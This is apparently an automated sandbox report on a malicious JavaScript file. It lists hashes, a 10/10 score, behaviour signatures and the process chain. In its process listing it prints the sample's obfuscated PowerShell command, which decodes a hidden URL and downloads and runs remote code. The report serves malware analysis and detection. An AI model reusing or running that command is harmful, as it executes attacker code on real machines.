Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
122s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
22/08/2024, 01:41
Static task
static1
Behavioral task
behavioral1
Sample
_rnnsnn.js
Resource
win7-20240704-en
2 signatures
150 seconds
Behavioral task
behavioral2
Sample
_rnnsnn.js
Resource
win10v2004-20240802-en
6 signatures
150 seconds
General
-
Target
_rnnsnn.js
-
Size
118KB
-
MD5
5068d584bdd33473911ffac1e3d66a38
-
SHA1
f66ff36a55ca2d51fe5ca1d88404542833873803
-
SHA256
c58c00c228cca6f542d90ae389bab8f0455917fd5e4bc396991d40d22cbb8448
-
SHA512
6311473e7c39be2092aa8f0edec141d17613f95493e8e35df209b71b364e024589a77d9a74e2afae5cb10b16639112121257806855d214686196d92725fa862e
-
SSDEEP
3072:L1VTo57Y8J7tcwIgwFyBuLn7zMv1z6WEbTScZhCft/:L3o5Kzg077zQm5fRP0d
Score
10/10
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2500 1948 conhost.exe 30 -
Command and Scripting Interpreter: JavaScript 1 TTPs
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\_rnnsnn.js1⤵PID:1296
-
C:\Windows\system32\conhost.execonhost --headless powershell $nemmbxede='ur';new-alias press c$($nemmbxede)l;$gmmurlxkvz=(6091,6079,6076,6094,6084,6097,6084,6101,6084,6080,6025,6095,6090,6091,6026,6028,6025,6091,6083,6091,6042,6094,6040,6088,6084,6089,6095,6094,6028,6030);$mrujgi=('bronx','get-cmdlet');$izttnhcn=$gmmurlxkvz;foreach($fssifukxy in $izttnhcn){$lrdpln=$fssifukxy;$iwsbbhtrf=$iwsbbhtrf+[char]($lrdpln-5979);$hgndvrz=$iwsbbhtrf;$xrovqwj=$hgndvrz};$gyqmidwxo[2]=$xrovqwj;$uuwoxs='rl';$brrikgly=1;.$([char](9992-9887)+'e'+'x')(press -useb $xrovqwj)1⤵
- Process spawned unexpected child process
PID:2500